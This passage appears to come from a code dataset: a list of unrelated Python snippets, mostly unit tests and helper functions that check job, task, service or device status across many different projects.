\"\"\"file://result <- file://source\n echo test\n \"\"\")\n workflow.pre_check_processes()\n try:\n process = workflow._processes[0]\n create_tuttle_dirs()\n workflow.run_process(process)\n assert False, \"Exception has not been not raised\"\n except ResourceError:\n assert True", "def test_1():\n\tassert api_call().status_code == 200", "def test_16_task_status_completed(self, mock):\r\n with self.flask_app.app_context():\r\n self.register()\r\n self.new_application()\r\n\r\n app = db.session.query(App).first()\r\n # We use a string here to check that it works too\r\n task = Task(app_id=app.id, info={'n_answers': '10'})\r\n db.session.add(task)\r\n db.session.commit()\r\n\r\n res = self.app.get('app/%s/tasks/browse' % (app.short_name),\r\n follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n assert \"Sample App\" in res.data, res.data\r\n assert '0 of 10' in res.data, res.data\r\n err_msg = \"Download button should be disabled\"\r\n assert dom.find(id='nothingtodownload') is not None, err_msg\r\n\r\n for i in range(5):\r\n task_run = TaskRun(app_id=app.id, task_id=1,\r\n info={'answer': 1})\r\n db.session.add(task_run)\r\n db.session.commit()\r\n self.app.get('api/app/%s/newtask' % app.id)\r\n\r\n res = self.app.get('app/%s/tasks/browse' % (app.short_name),\r\n follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n assert \"Sample App\" in res.data, res.data\r\n assert '5 of 10' in res.data, res.data\r\n err_msg = \"Download Partial results button should be shown\"\r\n assert dom.find(id='partialdownload') is not None, err_msg\r\n\r\n for i in range(5):\r\n task_run = TaskRun(app_id=app.id, task_id=1,\r\n info={'answer': 1})\r\n db.session.add(task_run)\r\n db.session.commit()\r\n self.app.get('api/app/%s/newtask' % app.id)\r\n\r\n self.signout()\r\n\r\n app = db.session.query(App).first()\r\n\r\n res = self.app.get('app/%s/tasks/browse' % (app.short_name),\r\n follow_redirects=True)\r\n assert \"Sample App\" in res.data, res.data\r\n msg = 'Task <span class=\"label label-success\">#1</span>'\r\n assert msg in res.data, res.data\r\n assert '10 of 10' in res.data, res.data\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Download Full results button should be shown\"\r\n assert dom.find(id='fulldownload') is not None, err_msg\r\n\r\n app.hidden = 1\r\n db.session.add(app)\r\n db.session.commit()\r\n res = self.app.get('app/%s/tasks/browse' % (app.short_name),\r\n follow_redirects=True)\r\n assert res.status_code == 403, res.status_code\r\n\r\n self.create()\r\n self.signin(email=Fixtures.email_addr2, password=Fixtures.password)\r\n res = self.app.get('app/%s/tasks/browse' % (app.short_name),\r\n follow_redirects=True)\r\n assert res.status_code == 403, res.status_code", "def test_wait_for_dispatched_statuses(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n d = worker_helper.wait_for_dispatched_statuses(1, 'fooconn')\n self.assertNoResult(d)\n\n msg = msg_helper.make_status(\n status='down',\n component='foo',\n type='bar',\n message='baz')\n\n yield self._add_to_dispatched(\n worker_helper.broker, 'fooconn.status', msg, kick=True)\n dispatched = success_result_of(d)\n self.assertEqual(dispatched, [msg])", "def test_is_running(self, mock_call):\n\t\tmock_call.return_value = False \n\t\tdevice = Device(1, \"testDevice\", \"testDesc\", \"pump\", 1)\n\t\tdm = DeviceManager()\n\t\tresponse = dm.isRunning(device) \n\t\tself.assertEqual(response, False)", "def test_do_status(config, mocker, path_map_mock):\n logger_mock = mocker.MagicMock()\n p = Unpacker(config, logger_mock)\n assert p._do_status() == {}", "def task_status():\n pass", "def check_fabric_is_alive(fabric):\n seq = get_random_sequence()\n msg = eptMsg(MSG_TYPE.GET_FABRIC_STATUS, seq=seq, data={\"fabric\":fabric})\n #logger.debug(\"get fabric status (seq:0x%x) fabric: %s\", seq, fabric)\n redis = get_redis()\n p = redis.pubsub(ignore_subscribe_messages=True)\n p.subscribe(MANAGER_CTRL_RESPONSE_CHANNEL)\n redis.publish(MANAGER_CTRL_CHANNEL, msg.jsonify())\n start_ts = time.time()\n timeout = AppStatus.MANAGER_STATUS_BRIEF_TIMEOUT\n try:\n while start_ts + timeout > time.time():\n data = p.get_message(timeout=0.5)\n if data is not None:\n channel = data[\"channel\"]\n if channel == MANAGER_CTRL_RESPONSE_CHANNEL:\n msg = eptMsg.parse(data[\"data\"]) \n if msg.msg_type == MSG_TYPE.FABRIC_STATUS:\n # validate this is the addr and sequence number our user requested\n if msg.seq == seq and \"fabric\" in msg.data and \\\n msg.data[\"fabric\"] == fabric:\n #logger.debug(\"fabric status (0x%x) alive:%r\",seq,msg.data[\"alive\"])\n if msg.data[\"alive\"]: \n return True\n else:\n return False\n else:\n logger.debug(\"rx seq/fabric (0x%x/%s), expected (0x%x/%s)\",\n msg.seq, msg.data.get(\"fabric\", \"\"), seq, fabric)\n except Exception as e:\n logger.debug(\"Traceback:\\n%s\", traceback.format_exc())\n logger.debug(\"error: %s\", e)\n finally:\n if redis is not None and hasattr(redis, \"connection_pool\"):\n redis.connection_pool.disconnect()\n logger.warn(\"no manager response within timeout(%s sec)\", timeout)\n return False", "def test_status(self):\n with DockerHost('host', dind=False, start_calico=False) as host:\n host.calicoctl(\"status\")", "def get_status() -> None:\n assert scraper.get_status() == True", "def test_status(self):\n\n url = '/%s/jobs/?status=RUNNING' % self.api\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 1)\n self.assertEqual(result['results'][0]['job_type']['id'], self.job1.job_type.id)", "def done(self):\n return self._info['status'] == 'DONE'", "def verify_get_response(self, status):\n validate(status, STATUS)\n self.assertTrue(status['database_connection']['connected'])\n self.assertTrue(status['redis_connection']['connected'])\n self.assertEqual(status['missing_workers'], [])\n self.assertNotEqual(status['online_workers'], [])\n self.assertNotEqual(status['versions'], [])", "async def run_check_service(call):\r\n result = await run_check(str(hass.config.path()))\r\n hass.components.persistent_notification.async_create(\r\n result, \"Configuration Check Result\", NOTIFYID\r\n )\r\n if result == \"\\nConfiguration is OK!\\n\":\r\n finish_service = call.data.get(\"service\")\r\n finish_service_data = call.data.get(\"service_data\", {})\r\n if finish_service is not None:\r\n domain = finish_service.split(\".\")[0]\r\n service = finish_service.split(\".\")[1]\r\n await hass.services.async_call(domain, service, finish_service_data)", "def run(self):\r\n logging.info(\"Now excecuting test step {}\".format(self.stepname))\r\n try:\r\n response = eval(\"requests.{}('{}',params={})\".format(self.verb, self.url, self.payload))\r\n return response, True\r\n\r\n except requests.exceptions.RequestException as e:\r\n logging.warn(\"test {} failed\".format(self.stepname))\r\n \r\n return None, False", "def test_sequence_done(self):\n self.t(\"1,2 done\")\n code, out, err = self.t(\"_get 1.status 2.status\")\n self.assertEqual(\"completed completed\\n\", out)", "def test_check_status(mock_send_message):\n A1sim.check_status(BASE_URL)\n mock_send_message.assert_called_once_with('GET',\n 'Get ric status',\n (f\"{BASE_URL}\"))", "async def run(self):\n current_status = \"Init\"\n while self.expected_status != current_status:\n await asyncio.sleep(1)\n async with aiohttp.ClientSession() as session:\n async with session.get(self.url) as response:\n api_call_result = await response.json()\n current_status = api_call_result[\"status\"]\n \n # Send our single event and then we're done\n yield TriggerEvent(api_call_result)", "def test_ping(self):\n\n # Access the service status page, which starts a delayed\n # asynchronous task\n response = self.client.get(self.ping_url)\n\n # HTTP response should be successful\n assert response.status_code == 200\n\n # Expect to get a JSON-serialized dict with\n # task and time information\n result_dict = json.loads(response.content.decode('utf-8'))\n\n # Was it successful?\n assert result_dict['success']\n\n # We should get a \"pong\" message back\n assert result_dict['value'] == 'pong'\n\n # We don't know the other dict values exactly,\n # but we can assert that they take the right form\n assert isinstance(result_dict['task_id'], str)\n assert isinstance(result_dict['time'], float)\n assert result_dict['time'] > 0.0", "def test_completed():\n assert complete == 1\n assert errorflag == 0", "def test_task(self, mocker):\n\n tid = 289466\n site = \"mysite\"\n json = self.generate_task_dictionary(tid, state=\"error\")\n url = (\n \"https://cloudapi.acquia.com/v1/\"\n \"sites/prod:{site}/tasks/{tid}.json\".format(tid=tid, site=site)\n )\n\n mocker.register_uri(\"GET\", url, json=json)\n\n task = self.client.site(site).task(tid)\n self.assertEqual(task[\"id\"], tid)\n self.assertEqual(task[\"state\"], \"error\")", "def custom_wait_for_completion(task_description, output):\n state = 'UNSUBMITTED'\n while not (state == 'COMPLETED' or state =='FAILED'):\n output.add_live_msg(ms.STATUS.format(state))\n time.sleep(5)\n \n #search for the task in task_list\n for task in task_description:\n current_task = gs.isTask(task)\n if current_task:\n state = current_task.state\n if state == 'RUNNING' or state == 'FAILED': \n break\n \n return state", "def test_service_status(self, api_instance):\n params = api_instance.get_service_status()\n # Only key we care about here is GetServiceStatus\n assert params[\"Action\"] == \"GetServiceStatus\"", "async def test_command_status(aresponses):\n aresponses.add(\n MATCH_HOST,\n \"/api/command/368630\",\n \"GET\",\n aresponses.Response(\n status=200,\n headers={\"Content-Type\": \"application/json\"},\n text=load_fixture(\"command-id.json\"),\n ),\n )\n\n async with ClientSession() as session:\n client = Sonarr(HOST, API_KEY, session=session)\n response = await client.command_status(368630)\n\n assert response\n assert isinstance(response, models.CommandItem)", "def test_successful(self):\n\n url = '/%s/job-types/running/' % self.api\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 1)\n self.assertEqual(result['results'][0]['job_type']['name'], self.job.job_type.name)\n self.assertEqual(result['results'][0]['count'], 1)\n self.assertIsNotNone(result['results'][0]['longest_running'])", "def processTask(self):\n #Util.set_color(Util.FOREGROUND_YELLOW | Util.FOREGROUND_INTENSITY)\n #logging.info(\"cmd : %s\", self.ExecutionTask.get_cmd())\n #logging.info(\"param : %s\", self.ExecutionTask.get_param())\n #logging.info(\"ret : %s\", str(self.ExecutionTask.get_ret()))\n #logging.info(\"ipport : %s\", self.ExecutionTask.get_ipport())\n #Util.set_color(Util.FOREGROUND_WHITE)\n\n ##############################################################\n # Process for any commands without received messages.....\n ##############################################################\n if self.ExecutionTask.get_cmd() == 'PASS' or self.ExecutionTask.get_cmd() == 'FAIL':\n logging.debug(\"result is %s\", self.ExecutionTask.get_cmd())\n self.setStatus('STOP')\n self.setTestResult(self.ExecutionTask.get_cmd())\n return\n\n if self.ExecutionTask.get_cmd() == 'r_info':\n rinfo_result = self.ExecutionTask.get_param().split('!')\n\n if len(rinfo_result) > 1:\n msg = rinfo_result[1]\n logging.debug(\"%s\", msg)\n\n self.setStatus('STOP')\n self.setTestResult(rinfo_result[0])\n return\n\n if self.ExecutionTask.get_cmd() == 'ResultCheck':\n time.sleep(5)\n self.process_ResultCheck()\n return\n\n if self.ExecutionTask.get_cmd() == 'CheckThroughput':\n time.sleep(5)\n throughputChk = StreamHandler(self.test_mngr_initr)\n chk_result = throughputChk.processStreamResults(self.ExecutionTask.get_param())\n self.setCheckResult(chk_result)\n #if 'FAIL' in chk_result:\n # self.setStatus('STOP')\n return\n\n if self.ExecutionTask.get_cmd() == 'config_multi_subresults':\n self.process_config_multi_subresults()\n return\n\n ##############################################################\n # Process for any commands with received messages......\n ##############################################################\n status = \"\"\n retDict = self.ExecutionTask.get_ret()\n recvStr = \"\"\n if self.ExecutionTask.recv:\n recvStr = self.ExecutionTask.recv.rstrip('\\r\\n')\n #print \"recv : \" + recvStr\n \n if GlobalConfigFiles.curr_prog_name == \"WMMPS\" and \"sniffer_control_subtask\" in self.ExecutionTask.get_cmd():\n logging.debug('In WMMPS, before parsing the recvStr: %s' % recvStr)\n lines = re.split('\\n', recvStr)\n for line in lines:\n if re.search(\"RESULT\", line, re.I):\n if \"FAIL\" in line:\n self.setStatus('STOP')\n self.setTestResult('FAIL')\n logging.debug('set test result to FAIL')\n return\n if \"PASS\" in line:\n self.setTestResult('PASS')\n logging.debug('set test result to Pass')\n return\n return\n \n stitems = recvStr.split(',') \n if len(stitems) < 2:\n #logging.debug(\"Bypassing this cmd..\")\n return\n\n status = stitems[1]\n iDNB = TestScriptSymbolTable.get_value_from_sym_tab(\"iDNB\", TestScriptSymbolTable.test_script_sym_tab)\n iINV = TestScriptSymbolTable.get_value_from_sym_tab(\"iINV\", TestScriptSymbolTable.test_script_sym_tab) \n \n if iINV is None:\n iINV = 0\n \n if 'ERROR' in recvStr or 'INVALID' in recvStr and (iDNB == 0 or iDNB is None) and (iINV == 0 or iINV is None):\n #error case...\n logging.debug(\"Return ERROR or INVALID---> STOP process \")\n self.setStatus('STOP')\n self.setTestResult('FAIL')\n elif status != 'COMPLETE' and iDNB == 0 and iINV == 0:\n #incomplete case...(running?)\n logging.debug(\"Command %s not completed\", self.ExecutionTask.get_cmd())\n else:\n displayname = \"\"\n for tbd in self.test_mngr_initr.test_prog_mngr.test_prog.testbed_dev_list:\n if tbd.ctrlipaddr == self.ExecutionTask.get_ipport():\n displayname = tbd.displayname\n break\n \n if \"FAIL\" in recvStr and (iINV == 0 or iINV is None):\n if \"SNIFFER\" in displayname or \"sniffer\" in self.ExecutionTask.get_cmd():\n logging.info(\"Test Case Criteria Failure - Command returned FAIL\")\n self.setStatus('STOP')\n self.setTestResult('FAIL')\n\n elif self.ExecutionTask.get_cmd() == 'device_get_info':\n try:\n if displayname == '':\n self.tmsPacket.setDutDeviceInfo(recvStr)\n else:\n self.tmsPacket.setTestbedInfo(displayname, recvStr)\n\n #for validation\n self.setValidationInfo(displayname, recvStr)\n\n except OSError:\n logging.debug(\"exception -- device_get_info capi call\")\n elif self.ExecutionTask.get_cmd() == 'ca_get_version':\n self.setValidationInfo(displayname, recvStr)\n\n elif self.ExecutionTask.get_cmd() == 'sniffer_get_info':\n self.setValidationInfo('sniffer', recvStr)\n\n elif self.ExecutionTask.get_cmd() == 'sta_associate':\n time.sleep(10)\n\n if len(stitems) > 2:\n retParam = self.ExecutionTask.get_param().split(',')\n streamFlag = \"\"\n if len(retParam) > 4:\n streamFlag = retParam[3]\n\n if stitems[2] == 'streamID':\n streamHndler = StreamHandler(self.test_mngr_initr)\n logging.debug(\"stream config - streamID : %s\", stitems[3])\n if streamFlag == 'send':\n logging.debug(\"traffic config - send : streamInfo append\")\n streamPacket = streamInfo(\"%s\" % (stitems[3]), self.ExecutionTask.get_ipport(), -1, 'send',\n retParam[15], retParam[17], streamHndler.running_phase, streamHndler.RTPCount)\n streamHndler.add_streamInfo(streamPacket)\n streamHndler.RTPCount = streamHndler.RTPCount + 1\n\n elif streamFlag == 'receive':\n logging.debug(\"traffic config - receive : streamInfo append\")\n streamPacket = streamInfo(\"%s\" % (stitems[3]), self.ExecutionTask.get_ipport(), -1, 'receive',\n -1, -1, streamHndler.running_phase, -1)\n streamHndler.add_streamInfo(streamPacket)\n\n else:\n logging.debug(\"traffic config - else : \")\n\n\n\n if retParam[1] == 'Multicast':\n logging.debug(\"----MULTICAST----\")\n streamHndler.multicast = 1\n\n if self.ExecutionTask.get_cmd() != \"traffic_agent_send\":\n ret_val = \"%s\" %(stitems[3].strip())\n logging.debug(\"traffic config - ret_val : %s\", ret_val)\n setRetVal(getRetKey(retDict), ret_val)\n\n elif stitems[2].lower() == 'interfacetype':\n ret_val = (\"%s\" %(stitems[5]))\n setRetVal(getRetKey(retDict), ret_val)\n\n elif stitems[2].lower() == 'interfaceid':\n ret_val = stitems[3].split('_')[0]\n setRetVal(getRetKey(retDict), ret_val)\n\n elif self.ExecutionTask.get_cmd() == 'traffic_stop_ping':\n\n keyVal = retParam[1]\n #\"%s;%s\"%(retParam[1], self.ExecutionTask.get_ipport())\n setRetVal(keyVal, stitems[5])\n #print(\"%s = %s\" % (retParam[1], stitems[5]))\n pinginternalchk = TestScriptSymbolTable.get_value_from_sym_tab(\"PingInternalChk\", TestScriptSymbolTable.test_script_sym_tab)\n temp_key = getRetKey(self.ExecutionTask.get_ret())\n \n if \"$\" in temp_key:\n sent_reply = temp_key.split(',')\n #print \"SLIM==> ping result save...\"\n #print sent_reply[0]\n #print sent_reply[1]\n setRetVal(sent_reply[0], stitems[3])\n setRetVal(sent_reply[1], stitems[5]) \n\n setRetVal(\"$pingResp\", stitems[5])\n if pinginternalchk == '0':\n logging.debug(\"Ping Internal Check\")\n \n elif stitems[5] == '0':\n logging.debug (\"Test Case Criteria Failure - NO IP Connection -- Aborting the test\")\n self.setStatus('STOP')\n self.setTestResult('FAIL')\n else:\n if stitems[5] == '0':\n logging.debug (\"Test Case Criteria Failure - NO IP Connection -- Aborting the test\")\n self.setStatus('STOP')\n self.setTestResult('FAIL')\n else:\n if len(retDict) > 0:\n tempKey = getRetKey(retDict)\n temp_val = tempKey.split(',')\n count = 0\n item_len = len(stitems)\n for i in temp_val:\n if item_len > count + 3:\n setRetVal(i, stitems[3+count])\n count = count + 2\n\n if self.__status == 'STOP':\n logging.debug(\"generate final result if task stops.\")\n #self.generateFinalResult()\n else:\n pass\n #logging.debug(\"Continue---\")\n return", "async def check_health():\n return {\"healthy\": True}", "def status(ABC) -> bool:", "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def check_health(self):\n return defer.succeed(True)", "def test_use_exit_status(self): # suppress(no-self-use)\n subprocess.call.return_value = 1\n GreenTestCommand(Distribution()).run()\n sys.exit.assert_called_with(1)", "def waitUntilSuccess():", "def v2_runner_on_ok(self, result, **kwargs):\n host = result._host\n task = result._task\n output = result._result\n if result._result.get('changed', False):\n status = 'changed'\n else:\n status = 'ok'\n self.results.append({\"host\": host.name, \"action\":task.action, \"status\":status, \"output\": output})", "def test_start(self):\n\n message = {\"method\": \"start\",\n \"params\": {\"elem\": self.container_to_run}}\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"start\")\n self.assertIsInstance(response[\"result\"], list)\n\n container_name = \"/\" + self.container_to_run\n\n containers = {i[0]: i[1] for i in response[\"result\"]}\n self.assertIn(container_name, containers.keys(),\n \"Container not found\")\n\n find_up_status = containers[container_name].lower().find(\"up\")\n\n self.assertEqual(find_up_status, 0, \"Container is not running\")", "def is_successful(self):\n for item in self.summary:\n if item['task_status'] is False:\n return testcase.TestCase.EX_TESTCASE_FAILED\n\n return super().is_successful()", "def status_check():\n return {\"status\": \"OK\"}", "def process_ResultCheck(self):\n try:\n cmd = self.ExecutionTask.get_param().split(',')\n logging.debug(\"%s-%s-%s-%s-%s\" % ( TestScriptSymbolTable.get_value_from_sym_tab(cmd[0], TestScriptSymbolTable.test_script_sym_tab),cmd[0], cmd[1], cmd[2], cmd[3]))\n\n checkval = cmd[0].split('!') \n \n cval = TestScriptSymbolTable.get_value_from_sym_tab(checkval[1], TestScriptSymbolTable.capi_cmd_ret_sym_tab)\n\n if int(cval) >= int(cmd[1]):\n result = cmd[2]\n else:\n result = cmd[3]\n\n logging.info(\"\\nRESULT CHECK---> %15s\", result) \n self.setTestResult(result)\n \n #if result == 'FAIL':\n if 'FAIL' in result:\n self.setStatus('STOP')\n self.setTestResult('FAIL')\n except OSError:\n logging.info(\"\\nException - ResultCheck\")", "def test_ping(self):\r\n\r\n # Access the service status page, which starts a delayed\r\n # asynchronous task\r\n response = self.client.get(self.ping_url)\r\n\r\n # HTTP response should be successful\r\n self.assertEqual(response.status_code, 200)\r\n\r\n # Expect to get a JSON-serialized dict with\r\n # task and time information\r\n result_dict = json.loads(response.content)\r\n\r\n # Was it successful?\r\n self.assertTrue(result_dict['success'])\r\n\r\n # We should get a \"pong\" message back\r\n self.assertEqual(result_dict['value'], \"pong\")\r\n\r\n # We don't know the other dict values exactly,\r\n # but we can assert that they take the right form\r\n self.assertIsInstance(result_dict['task_id'], unicode)\r\n self.assertIsInstance(result_dict['time'], float)\r\n self.assertTrue(result_dict['time'] > 0.0)", "def status_check(task_id):\n logger.info(f\"Checking task status for {task_id}\")\n task = Task.objects.get(kf_id=task_id)\n task.status_check()", "def is_success(self):\n succ = self.env._check_success()\n if isinstance(succ, dict):\n assert \"task\" in succ\n return succ\n return { \"task\" : succ }", "def test_18_task_status_wip(self, mock):\r\n with self.flask_app.app_context():\r\n self.register()\r\n self.new_application()\r\n\r\n app = db.session.query(App).first()\r\n task = Task(app_id=app.id, info={'n_answers': 10})\r\n db.session.add(task)\r\n db.session.commit()\r\n self.signout()\r\n\r\n app = db.session.query(App).first()\r\n\r\n res = self.app.get('app/%s/tasks/browse' % (app.short_name),\r\n follow_redirects=True)\r\n assert \"Sample App\" in res.data, res.data\r\n msg = 'Task <span class=\"label label-info\">#1</span>'\r\n assert msg in res.data, res.data\r\n assert '0 of 10' in res.data, res.data\r\n\r\n # For a non existing page\r\n res = self.app.get('app/%s/tasks/browse/5000' % (app.short_name),\r\n follow_redirects=True)\r\n assert res.status_code == 404, res.status_code", "def test_execute_status(self):\n # Setup params\n n_slots = 3\n status_cmd = \"status\"\n\n # Prepare n number of empty slots\n self.prepare_cars(n_slots)\n\n # Verify command is able to execute without errors\n self.controller.execute(status_cmd)", "def test_get_start_true(self):\n\n tt = TemperatureTracker()\n tt.start()\n self.assertIsNotNone(tt.get_start())", "def test_get_status(self):\n response = self.client.open(\n '/v1/status',\n method='GET')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def check_completion(self):\n\n time.sleep(3)\n while self.status == 0:\n pass", "def test_log_success(self, mock_info):\n\n with utils.log_activity(\"for test\"):\n pass\n\n mock_info.assert_any_call(\"[jaxline] %s starting...\", \"for test\")\n mock_info.assert_any_call(\"[jaxline] %s finished.\", \"for test\")", "def is_call_waiting(self) -> bool:", "def checkRunning(procname):\n return procdata.checkRunning(procname)", "def testGetPortStatus(self):\n self.ports.get_port_status(file_name = 'get_port_status.xml', port_ids = portsDict['port_ids'], port_status = portsDict['port_status'])", "def test_check_exit_status(self):\n run_dir_success = 'data/nanopore_data/run4/done_demuxing/20200104_1412_MN19414_AAU644_68125dc2'\n success_run = MinIONqc(run_dir_success, None, None)\n self.assertTrue(success_run.check_exit_status('data/nanopore_data/run4/done_demuxing/20200104_1412_MN19414_AAU644_68125dc2/.exitcode_for_nanoseq'))\n run_dir_fail = 'data/nanopore_data/run8/demux_failed/20200108_1412_MN19414_AAU648_68125dc2'\n fail_run = MinIONqc(run_dir_fail, None, None)\n self.assertFalse(fail_run.check_exit_status('data/nanopore_data/run8/demux_failed/20200108_1412_MN19414_AAU648_68125dc2/.exitcode_for_nanoseq'))", "def _has_run(self, opt: dict, status: Union[List[str], str]):\n if isinstance(status, str):\n status = [status]\n\n for item in self._query_by_dict(opt):\n if item.get('status') in status:\n return True\n return False", "async def test_health_check(client: AsyncClient):\n\n response = await client.get(f\"/health-check\")\n assert response.status_code == 200\n\n data = response.json()\n assert data[\"service\"][\"status\"] == \"healthy\"\n assert data[\"service\"][\"error\"] is None\n assert data[\"database\"][\"status\"] == \"healthy\"\n assert data[\"database\"][\"error\"] is None", "def mark_completed(self,status):\r\n if status == \"r\":\r\n self.status = \"c\"#It is to test the mark complete function in the test_book.py, otherwise this program works fine in the main.py\r\n return True\r\n elif status == \"c\":\r\n return False", "def test_check_freq_complete(self):\n self.assertEqual(check_freq(self.jobset1), 'completed')", "def test_check_sms_campaign_pendingcall(self):\n result = check_sms_campaign_pendingcall.delay(1)\n self.assertEqual(result.successful(), True)", "def check_result(self, result):\n self.log.info(\"--check_result, result= %s\", result)\n if result[0]['exit_status'] != 0:\n self.fail(\"##Error detected from check_result\")\n else:\n self.log.info(\"--check_result passed\")", "def test_check_status(self):\n post_json = {\"submission_id\": self.status_check_submission_id}\n # Populating error info before calling route to avoid changing last update time\n\n with create_app().app_context():\n sess = GlobalDB.db().session\n populate_submission_error_info(self.status_check_submission_id)\n\n response = self.app.post_json(\"/v1/check_status/\", post_json, headers={\"x-session-id\": self.session_id})\n\n self.assertEqual(response.status_code, 200, msg=str(response.json))\n self.assertEqual(response.headers.get(\"Content-Type\"), \"application/json\")\n json = response.json\n # response ids are coming back as string, so patch the jobIdDict\n job_id_dict = {k: str(self.jobIdDict[k]) for k in self.jobIdDict.keys()}\n job_list = json[\"jobs\"]\n approp_job = None\n cross_job = None\n for job in job_list:\n if str(job[\"job_id\"]) == str(job_id_dict[\"appropriations\"]):\n # Found the job to be checked\n approp_job = job\n elif str(job[\"job_id\"]) == str(job_id_dict[\"cross_file\"]):\n # Found cross file job\n cross_job = job\n\n # Must have an approp job and cross-file job\n self.assertNotEqual(approp_job, None)\n self.assertNotEqual(cross_job, None)\n # And that job must have the following\n self.assertEqual(approp_job[\"job_status\"], \"ready\")\n self.assertEqual(approp_job[\"job_type\"], \"csv_record_validation\")\n self.assertEqual(approp_job[\"file_type\"], \"appropriations\")\n self.assertEqual(approp_job[\"filename\"], \"approp.csv\")\n self.assertEqual(approp_job[\"file_status\"], \"complete\")\n self.assertIn(\"missing_header_one\", approp_job[\"missing_headers\"])\n self.assertIn(\"missing_header_two\", approp_job[\"missing_headers\"])\n self.assertIn(\"duplicated_header_one\", approp_job[\"duplicated_headers\"])\n self.assertIn(\"duplicated_header_two\", approp_job[\"duplicated_headers\"])\n # Check file size and number of rows\n self.assertEqual(approp_job[\"file_size\"], 2345)\n self.assertEqual(approp_job[\"number_of_rows\"], 567)\n\n # Check error metadata for specified error\n rule_error_data = None\n for data in approp_job[\"error_data\"]:\n if data[\"field_name\"] == \"header_three\":\n rule_error_data = data\n self.assertIsNotNone(rule_error_data)\n self.assertEqual(rule_error_data[\"field_name\"], \"header_three\")\n self.assertEqual(rule_error_data[\"error_name\"], \"rule_failed\")\n self.assertEqual(rule_error_data[\"error_description\"], \"A rule failed for this value.\")\n self.assertEqual(rule_error_data[\"occurrences\"], \"7\")\n self.assertEqual(rule_error_data[\"rule_failed\"], \"Header three value must be real\")\n self.assertEqual(rule_error_data[\"original_label\"], \"A1\")\n # Check warning metadata for specified warning\n warning_error_data = None\n for data in approp_job[\"warning_data\"]:\n if data[\"field_name\"] == \"header_three\":\n warning_error_data = data\n self.assertIsNotNone(warning_error_data)\n self.assertEqual(warning_error_data[\"field_name\"], \"header_three\")\n self.assertEqual(warning_error_data[\"error_name\"], \"rule_failed\")\n self.assertEqual(warning_error_data[\"error_description\"], \"A rule failed for this value.\")\n self.assertEqual(warning_error_data[\"occurrences\"], \"7\")\n self.assertEqual(warning_error_data[\"rule_failed\"], \"Header three value looks odd\")\n self.assertEqual(warning_error_data[\"original_label\"], \"A2\")\n\n rule_error_data = None\n for data in cross_job[\"error_data\"]:\n if data[\"field_name\"] == \"header_four\":\n rule_error_data = data\n\n self.assertEqual(rule_error_data[\"source_file\"], \"appropriations\")\n self.assertEqual(rule_error_data[\"target_file\"], \"award\")\n\n # Check submission metadata\n self.assertEqual(json[\"cgac_code\"], \"SYS\")\n self.assertEqual(json[\"reporting_period_start_date\"], \"Q1/2016\")\n self.assertEqual(json[\"reporting_period_end_date\"], \"Q1/2016\")\n\n # Check submission level info\n self.assertEqual(json[\"number_of_errors\"], 17)\n self.assertEqual(json[\"number_of_rows\"], 667)\n\n # Get submission from db for attribute checks\n submission = sess.query(Submission).filter(\n Submission.submission_id == self.status_check_submission_id).one()\n\n # Check number of errors and warnings in submission table\n self.assertEqual(submission.number_of_errors, 17)\n self.assertEqual(submission.number_of_warnings, 7)\n\n # Check that submission was created today, this test may fail if run right at midnight UTC\n self.assertEqual(json[\"created_on\"], datetime.utcnow().strftime(\"%m/%d/%Y\"))\n self.assertEqual(json[\"last_updated\"], submission.updated_at.strftime(\"%Y-%m-%dT%H:%M:%S\"))", "def test_get_refresh_job_status(self):\n pass", "def test_dispatch_status(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n broker = self.setup_broker(worker_helper)\n\n self.assertEqual(broker.get_messages('vumi', 'fooconn.status'), [])\n\n msg = msg_helper.make_status(\n status='down',\n component='foo',\n type='bar',\n message='baz')\n\n yield worker_helper.dispatch_status(msg, 'fooconn')\n\n self.assertEqual(\n broker.get_messages('vumi', 'fooconn.status'), [msg])", "def test_status(self):\n resource = self.eventSourceResource()\n response = self.render(resource)\n\n self.assertEquals(response.code, 200)", "def test_wait_for_dispatched_statuses_no_connector(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper(status_connector_name='fooconn')\n d = worker_helper.wait_for_dispatched_statuses(1)\n\n msg = msg_helper.make_status(\n status='down',\n component='foo',\n type='bar',\n message='baz')\n\n yield self._add_to_dispatched(\n worker_helper.broker, 'fooconn.status', msg, kick=True)\n dispatched = success_result_of(d)\n self.assertEqual(dispatched, [msg])", "def test_response_ok():\n\t\n\t# Send GET request to API given endpoint and store the response.\n\tresponse = get_items()\n\n\t# Confirm that the request-response cycle completed successfully.\n\t#assert_true(response.ok)\n\tif ('None' in response): print(\"Failed calling REST API: {}\".format(response))\n\telse: print(\"TC Passed, Response OK: {}\".format(response))", "def test_get_jobs_status(\n globals, urls, client, mock_test_responses, context_fixture):\n\n context = context_fixture('Healthy')\n mock_test_responses(task='upload', status=CoreStatus.DONE)\n responses.add(\n responses.GET, urls('task', 'upload'),\n json={\n '_id': globals['upload'],\n 'status': CoreStatus.FAIL\n },\n status=200,\n content_type='application/json')\n\n for i in range(2):\n client.upload(file=globals['test_csv_file'], name=str(i))\n\n context.run()\n job_fail = context.get_jobs_status(status=['fail'])\n\n assert job_fail.iloc[0]['status'] == 'fail'\n assert job_fail.iloc[0]['Job'] == '1'", "def test_pt_present(\n self, ensure_present_func, ensure_absent_func, check_mode):\n\n # Prepare input arguments\n params = {\n 'state': 'present',\n 'log_file': None,\n }\n\n # Prepare return values\n changed = 